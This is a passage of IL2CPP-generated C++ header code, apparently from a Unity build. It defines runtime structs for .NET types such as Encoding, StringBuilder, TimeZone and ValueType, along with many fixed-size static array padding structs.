Il2CppCodeGenWriteBarrier((&___decoderFallback_14), value); } }; struct Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_StaticFields { public: // System.Text.Encoding modreq(System.Runtime.CompilerServices.IsVolatile) System.Text.Encoding::defaultEncoding Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___defaultEncoding_0; // System.Text.Encoding modreq(System.Runtime.CompilerServices.IsVolatile) System.Text.Encoding::unicodeEncoding Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___unicodeEncoding_1; // System.Text.Encoding modreq(System.Runtime.CompilerServices.IsVolatile) System.Text.Encoding::bigEndianUnicode Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___bigEndianUnicode_2; // System.Text.Encoding modreq(System.Runtime.CompilerServices.IsVolatile) System.Text.Encoding::utf7Encoding Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___utf7Encoding_3; // System.Text.Encoding modreq(System.Runtime.CompilerServices.IsVolatile) System.Text.Encoding::utf8Encoding Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___utf8Encoding_4; // System.Text.Encoding modreq(System.Runtime.CompilerServices.IsVolatile) System.Text.Encoding::utf32Encoding Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___utf32Encoding_5; // System.Text.Encoding modreq(System.Runtime.CompilerServices.IsVolatile) System.Text.Encoding::asciiEncoding Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___asciiEncoding_6; // System.Text.Encoding modreq(System.Runtime.CompilerServices.IsVolatile) System.Text.Encoding::latin1Encoding Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___latin1Encoding_7; // System.Collections.Hashtable modreq(System.Runtime.CompilerServices.IsVolatile) System.Text.Encoding::encodings Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 * ___encodings_8; // System.Object System.Text.Encoding::s_InternalSyncObject RuntimeObject * ___s_InternalSyncObject_15; public: inline static int32_t get_offset_of_defaultEncoding_0() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_StaticFields, ___defaultEncoding_0)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_defaultEncoding_0() const { return ___defaultEncoding_0; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_defaultEncoding_0() { return &___defaultEncoding_0; } inline void set_defaultEncoding_0(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___defaultEncoding_0 = value; Il2CppCodeGenWriteBarrier((&___defaultEncoding_0), value); } inline static int32_t get_offset_of_unicodeEncoding_1() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_StaticFields, ___unicodeEncoding_1)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_unicodeEncoding_1() const { return ___unicodeEncoding_1; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_unicodeEncoding_1() { return &___unicodeEncoding_1; } inline void set_unicodeEncoding_1(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___unicodeEncoding_1 = value; Il2CppCodeGenWriteBarrier((&___unicodeEncoding_1), value); } inline static int32_t get_offset_of_bigEndianUnicode_2() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_StaticFields, ___bigEndianUnicode_2)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_bigEndianUnicode_2() const { return ___bigEndianUnicode_2; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_bigEndianUnicode_2() { return &___bigEndianUnicode_2; } inline void set_bigEndianUnicode_2(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___bigEndianUnicode_2 = value; Il2CppCodeGenWriteBarrier((&___bigEndianUnicode_2), value); } inline static int32_t get_offset_of_utf7Encoding_3() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_StaticFields, ___utf7Encoding_3)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_utf7Encoding_3() const { return ___utf7Encoding_3; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_utf7Encoding_3() { return &___utf7Encoding_3; } inline void set_utf7Encoding_3(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___utf7Encoding_3 = value; Il2CppCodeGenWriteBarrier((&___utf7Encoding_3), value); } inline static int32_t get_offset_of_utf8Encoding_4() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_StaticFields, ___utf8Encoding_4)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_utf8Encoding_4() const { return ___utf8Encoding_4; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_utf8Encoding_4() { return &___utf8Encoding_4; } inline void set_utf8Encoding_4(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___utf8Encoding_4 = value; Il2CppCodeGenWriteBarrier((&___utf8Encoding_4), value); } inline static int32_t get_offset_of_utf32Encoding_5() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_StaticFields, ___utf32Encoding_5)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_utf32Encoding_5() const { return ___utf32Encoding_5; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_utf32Encoding_5() { return &___utf32Encoding_5; } inline void set_utf32Encoding_5(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___utf32Encoding_5 = value; Il2CppCodeGenWriteBarrier((&___utf32Encoding_5), value); } inline static int32_t get_offset_of_asciiEncoding_6() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_StaticFields, ___asciiEncoding_6)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_asciiEncoding_6() const { return ___asciiEncoding_6; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_asciiEncoding_6() { return &___asciiEncoding_6; } inline void set_asciiEncoding_6(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___asciiEncoding_6 = value; Il2CppCodeGenWriteBarrier((&___asciiEncoding_6), value); } inline static int32_t get_offset_of_latin1Encoding_7() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_StaticFields, ___latin1Encoding_7)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_latin1Encoding_7() const { return ___latin1Encoding_7; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_latin1Encoding_7() { return &___latin1Encoding_7; } inline void set_latin1Encoding_7(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___latin1Encoding_7 = value; Il2CppCodeGenWriteBarrier((&___latin1Encoding_7), value); } inline static int32_t get_offset_of_encodings_8() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_StaticFields, ___encodings_8)); } inline Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 * get_encodings_8() const { return ___encodings_8; } inline Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 ** get_address_of_encodings_8() { return &___encodings_8; } inline void set_encodings_8(Hashtable_t978F65B8006C8F5504B286526AEC6608FF983FC9 * value) { ___encodings_8 = value; Il2CppCodeGenWriteBarrier((&___encodings_8), value); } inline static int32_t get_offset_of_s_InternalSyncObject_15() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_StaticFields, ___s_InternalSyncObject_15)); } inline RuntimeObject * get_s_InternalSyncObject_15() const { return ___s_InternalSyncObject_15; } inline RuntimeObject ** get_address_of_s_InternalSyncObject_15() { return &___s_InternalSyncObject_15; } inline void set_s_InternalSyncObject_15(RuntimeObject * value) { ___s_InternalSyncObject_15 = value; Il2CppCodeGenWriteBarrier((&___s_InternalSyncObject_15), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // ENCODING_T7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_H #ifndef STRINGBUILDER_T_H #define STRINGBUILDER_T_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Text.StringBuilder struct StringBuilder_t : public RuntimeObject { public: // System.Char[] System.Text.StringBuilder::m_ChunkChars CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* ___m_ChunkChars_0; // System.Text.StringBuilder System.Text.StringBuilder::m_ChunkPrevious StringBuilder_t * ___m_ChunkPrevious_1; // System.Int32 System.Text.StringBuilder::m_ChunkLength int32_t ___m_ChunkLength_2; // System.Int32 System.Text.StringBuilder::m_ChunkOffset int32_t ___m_ChunkOffset_3; // System.Int32 System.Text.StringBuilder::m_MaxCapacity int32_t ___m_MaxCapacity_4; public: inline static int32_t get_offset_of_m_ChunkChars_0() { return static_cast<int32_t>(offsetof(StringBuilder_t, ___m_ChunkChars_0)); } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* get_m_ChunkChars_0() const { return ___m_ChunkChars_0; } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2** get_address_of_m_ChunkChars_0() { return &___m_ChunkChars_0; } inline void set_m_ChunkChars_0(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* value) { ___m_ChunkChars_0 = value; Il2CppCodeGenWriteBarrier((&___m_ChunkChars_0), value); } inline static int32_t get_offset_of_m_ChunkPrevious_1() { return static_cast<int32_t>(offsetof(StringBuilder_t, ___m_ChunkPrevious_1)); } inline StringBuilder_t * get_m_ChunkPrevious_1() const { return ___m_ChunkPrevious_1; } inline StringBuilder_t ** get_address_of_m_ChunkPrevious_1() { return &___m_ChunkPrevious_1; } inline void set_m_ChunkPrevious_1(StringBuilder_t * value) { ___m_ChunkPrevious_1 = value; Il2CppCodeGenWriteBarrier((&___m_ChunkPrevious_1), value); } inline static int32_t get_offset_of_m_ChunkLength_2() { return static_cast<int32_t>(offsetof(StringBuilder_t, ___m_ChunkLength_2)); } inline int32_t get_m_ChunkLength_2() const { return ___m_ChunkLength_2; } inline int32_t* get_address_of_m_ChunkLength_2() { return &___m_ChunkLength_2; } inline void set_m_ChunkLength_2(int32_t value) { ___m_ChunkLength_2 = value; } inline static int32_t get_offset_of_m_ChunkOffset_3() { return static_cast<int32_t>(offsetof(StringBuilder_t, ___m_ChunkOffset_3)); } inline int32_t get_m_ChunkOffset_3() const { return ___m_ChunkOffset_3; } inline int32_t* get_address_of_m_ChunkOffset_3() { return &___m_ChunkOffset_3; } inline void set_m_ChunkOffset_3(int32_t value) { ___m_ChunkOffset_3 = value; } inline static int32_t get_offset_of_m_MaxCapacity_4() { return static_cast<int32_t>(offsetof(StringBuilder_t, ___m_MaxCapacity_4)); } inline int32_t get_m_MaxCapacity_4() const { return ___m_MaxCapacity_4; } inline int32_t* get_address_of_m_MaxCapacity_4() { return &___m_MaxCapacity_4; } inline void set_m_MaxCapacity_4(int32_t value) { ___m_MaxCapacity_4 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // STRINGBUILDER_T_H #ifndef TIMEZONE_TA2DF435DA1A379978B885F0872A93774666B7454_H #define TIMEZONE_TA2DF435DA1A379978B885F0872A93774666B7454_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.TimeZone struct TimeZone_tA2DF435DA1A379978B885F0872A93774666B7454 : public RuntimeObject { public: public: }; struct TimeZone_tA2DF435DA1A379978B885F0872A93774666B7454_StaticFields { public: // System.Object System.TimeZone::tz_lock RuntimeObject * ___tz_lock_0; public: inline static int32_t get_offset_of_tz_lock_0() { return static_cast<int32_t>(offsetof(TimeZone_tA2DF435DA1A379978B885F0872A93774666B7454_StaticFields, ___tz_lock_0)); } inline RuntimeObject * get_tz_lock_0() const { return ___tz_lock_0; } inline RuntimeObject ** get_address_of_tz_lock_0() { return &___tz_lock_0; } inline void set_tz_lock_0(RuntimeObject * value) { ___tz_lock_0 = value; Il2CppCodeGenWriteBarrier((&___tz_lock_0), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TIMEZONE_TA2DF435DA1A379978B885F0872A93774666B7454_H #ifndef VALUETYPE_T4D0C27076F7C36E76190FB3328E232BCB1CD1FFF_H #define VALUETYPE_T4D0C27076F7C36E76190FB3328E232BCB1CD1FFF_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ValueType struct ValueType_t4D0C27076F7C36E76190FB3328E232BCB1CD1FFF : public RuntimeObject { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.ValueType struct ValueType_t4D0C27076F7C36E76190FB3328E232BCB1CD1FFF_marshaled_pinvoke { }; // Native definition for COM marshalling of System.ValueType struct ValueType_t4D0C27076F7C36E76190FB3328E232BCB1CD1FFF_marshaled_com { }; #endif // VALUETYPE_T4D0C27076F7C36E76190FB3328E232BCB1CD1FFF_H #ifndef __STATICARRAYINITTYPESIZEU3D10_T39E3D966A21885323F15EB866ABDE668EA1ED52C_H #define __STATICARRAYINITTYPESIZEU3D10_T39E3D966A21885323F15EB866ABDE668EA1ED52C_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=10 struct __StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C__padding[10]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D10_T39E3D966A21885323F15EB866ABDE668EA1ED52C_H #ifndef __STATICARRAYINITTYPESIZEU3D1018_T7825BE1556EFF874DAFDC230EB69C85A48DBCBC4_H #define __STATICARRAYINITTYPESIZEU3D1018_T7825BE1556EFF874DAFDC230EB69C85A48DBCBC4_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=1018 struct __StaticArrayInitTypeSizeU3D1018_t7825BE1556EFF874DAFDC230EB69C85A48DBCBC4 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D1018_t7825BE1556EFF874DAFDC230EB69C85A48DBCBC4__padding[1018]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D1018_T7825BE1556EFF874DAFDC230EB69C85A48DBCBC4_H #ifndef __STATICARRAYINITTYPESIZEU3D1080_TCE36DA14009C45CFDEA7F63618BE90F8DF89AC84_H #define __STATICARRAYINITTYPESIZEU3D1080_TCE36DA14009C45CFDEA7F63618BE90F8DF89AC84_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=1080 struct __StaticArrayInitTypeSizeU3D1080_tCE36DA14009C45CFDEA7F63618BE90F8DF89AC84 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D1080_tCE36DA14009C45CFDEA7F63618BE90F8DF89AC84__padding[1080]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D1080_TCE36DA14009C45CFDEA7F63618BE90F8DF89AC84_H #ifndef __STATICARRAYINITTYPESIZEU3D11614_TDF34959BE752359A89A4A577B8798D2D66A5E7F5_H #define __STATICARRAYINITTYPESIZEU3D11614_TDF34959BE752359A89A4A577B8798D2D66A5E7F5_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=11614 struct __StaticArrayInitTypeSizeU3D11614_tDF34959BE752359A89A4A577B8798D2D66A5E7F5 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D11614_tDF34959BE752359A89A4A577B8798D2D66A5E7F5__padding[11614]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D11614_TDF34959BE752359A89A4A577B8798D2D66A5E7F5_H #ifndef __STATICARRAYINITTYPESIZEU3D12_TB4B4C95019D88097B57DE7B50445942256BF2879_H #define __STATICARRAYINITTYPESIZEU3D12_TB4B4C95019D88097B57DE7B50445942256BF2879_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=12 struct __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879__padding[12]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D12_TB4B4C95019D88097B57DE7B50445942256BF2879_H #ifndef __STATICARRAYINITTYPESIZEU3D120_TBA46FD2E9DA153FD8457EE7F425E8ECC517EA252_H #define __STATICARRAYINITTYPESIZEU3D120_TBA46FD2E9DA153FD8457EE7F425E8ECC517EA252_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=120 struct __StaticArrayInitTypeSizeU3D120_tBA46FD2E9DA153FD8457EE7F425E8ECC517EA252 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D120_tBA46FD2E9DA153FD8457EE7F425E8ECC517EA252__padding[120]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D120_TBA46FD2E9DA153FD8457EE7F425E8ECC517EA252_H #ifndef __STATICARRAYINITTYPESIZEU3D1208_TC58894ECFE2C4FFD2B8FCDF958800099A737C1DD_H #define __STATICARRAYINITTYPESIZEU3D1208_TC58894ECFE2C4FFD2B8FCDF958800099A737C1DD_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=1208 struct __StaticArrayInitTypeSizeU3D1208_tC58894ECFE2C4FFD2B8FCDF958800099A737C1DD { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D1208_tC58894ECFE2C4FFD2B8FCDF958800099A737C1DD__padding[1208]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D1208_TC58894ECFE2C4FFD2B8FCDF958800099A737C1DD_H #ifndef __STATICARRAYINITTYPESIZEU3D128_T1B13688BD6EA82B964734FF8C3181161EF5624B1_H #define __STATICARRAYINITTYPESIZEU3D128_T1B13688BD6EA82B964734FF8C3181161EF5624B1_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=128 struct __StaticArrayInitTypeSizeU3D128_t1B13688BD6EA82B964734FF8C3181161EF5624B1 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D128_t1B13688BD6EA82B964734FF8C3181161EF5624B1__padding[128]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D128_T1B13688BD6EA82B964734FF8C3181161EF5624B1_H #ifndef __STATICARRAYINITTYPESIZEU3D130_T732A6F42953325ADC5746FF1A652A2974473AF4F_H #define __STATICARRAYINITTYPESIZEU3D130_T732A6F42953325ADC5746FF1A652A2974473AF4F_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=130 struct __StaticArrayInitTypeSizeU3D130_t732A6F42953325ADC5746FF1A652A2974473AF4F { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D130_t732A6F42953325ADC5746FF1A652A2974473AF4F__padding[130]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D130_T732A6F42953325ADC5746FF1A652A2974473AF4F_H #ifndef __STATICARRAYINITTYPESIZEU3D14_TAC1FF6EBB83457B9752372565F242D9A7C69FD05_H #define __STATICARRAYINITTYPESIZEU3D14_TAC1FF6EBB83457B9752372565F242D9A7C69FD05_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=14 struct __StaticArrayInitTypeSizeU3D14_tAC1FF6EBB83457B9752372565F242D9A7C69FD05 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D14_tAC1FF6EBB83457B9752372565F242D9A7C69FD05__padding[14]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D14_TAC1FF6EBB83457B9752372565F242D9A7C69FD05_H #ifndef __STATICARRAYINITTYPESIZEU3D1450_T58DE69DB537BA7DFBFF2C7084FFC6970FB3BAEA4_H #define __STATICARRAYINITTYPESIZEU3D1450_T58DE69DB537BA7DFBFF2C7084FFC6970FB3BAEA4_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=1450 struct __StaticArrayInitTypeSizeU3D1450_t58DE69DB537BA7DFBFF2C7084FFC6970FB3BAEA4 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D1450_t58DE69DB537BA7DFBFF2C7084FFC6970FB3BAEA4__padding[1450]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D1450_T58DE69DB537BA7DFBFF2C7084FFC6970FB3BAEA4_H #ifndef __STATICARRAYINITTYPESIZEU3D16_T35B2E1DB11C9D3150BF800DC30A2808C4F1A1341_H #define __STATICARRAYINITTYPESIZEU3D16_T35B2E1DB11C9D3150BF800DC30A2808C4F1A1341_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=16 struct __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341__padding[16]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D16_T35B2E1DB11C9D3150BF800DC30A2808C4F1A1341_H #ifndef __STATICARRAYINITTYPESIZEU3D162_TFFF125F871C6A7DE42BE37AC907E2E2149A861AA_H #define __STATICARRAYINITTYPESIZEU3D162_TFFF125F871C6A7DE42BE37AC907E2E2149A861AA_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=162 struct __StaticArrayInitTypeSizeU3D162_tFFF125F871C6A7DE42BE37AC907E2E2149A861AA { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D162_tFFF125F871C6A7DE42BE37AC907E2E2149A861AA__padding[162]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D162_TFFF125F871C6A7DE42BE37AC907E2E2149A861AA_H #ifndef __STATICARRAYINITTYPESIZEU3D1665_TCD7752863825B82B07752CCE72A581C169E19C20_H #define __STATICARRAYINITTYPESIZEU3D1665_TCD7752863825B82B07752CCE72A581C169E19C20_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=1665 struct __StaticArrayInitTypeSizeU3D1665_tCD7752863825B82B07752CCE72A581C169E19C20 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D1665_tCD7752863825B82B07752CCE72A581C169E19C20__padding[1665]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D1665_TCD7752863825B82B07752CCE72A581C169E19C20_H #ifndef __STATICARRAYINITTYPESIZEU3D174_T58EBFEBC3E6F34CF7C54ED51E8113E34B876351F_H #define __STATICARRAYINITTYPESIZEU3D174_T58EBFEBC3E6F34CF7C54ED51E8113E34B876351F_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=174 struct __StaticArrayInitTypeSizeU3D174_t58EBFEBC3E6F34CF7C54ED51E8113E34B876351F { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D174_t58EBFEBC3E6F34CF7C54ED51E8113E34B876351F__padding[174]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D174_T58EBFEBC3E6F34CF7C54ED51E8113E34B876351F_H #ifndef __STATICARRAYINITTYPESIZEU3D20_T4B48985ED9F1499360D72CB311F3EB54FB7C4B63_H #define __STATICARRAYINITTYPESIZEU3D20_T4B48985ED9F1499360D72CB311F3EB54FB7C4B63_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=20 struct __StaticArrayInitTypeSizeU3D20_t4B48985ED9F1499360D72CB311F3EB54FB7C4B63 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D20_t4B48985ED9F1499360D72CB311F3EB54FB7C4B63__padding[20]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D20_T4B48985ED9F1499360D72CB311F3EB54FB7C4B63_H #ifndef __STATICARRAYINITTYPESIZEU3D2048_T95CEED630052F2BBE3122C058EEAD48DB4C2AD02_H #define __STATICARRAYINITTYPESIZEU3D2048_T95CEED630052F2BBE3122C058EEAD48DB4C2AD02_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=2048 struct __StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02__padding[2048]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D2048_T95CEED630052F2BBE3122C058EEAD48DB4C2AD02_H #ifndef __STATICARRAYINITTYPESIZEU3D2100_T75CE52CDAFC7C95EDAB5CF1AF8B2621D502F1FAA_H #define __STATICARRAYINITTYPESIZEU3D2100_T75CE52CDAFC7C95EDAB5CF1AF8B2621D502F1FAA_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=2100 struct __StaticArrayInitTypeSizeU3D2100_t75CE52CDAFC7C95EDAB5CF1AF8B2621D502F1FAA { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D2100_t75CE52CDAFC7C95EDAB5CF1AF8B2621D502F1FAA__padding[2100]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D2100_T75CE52CDAFC7C95EDAB5CF1AF8B2621D502F1FAA_H 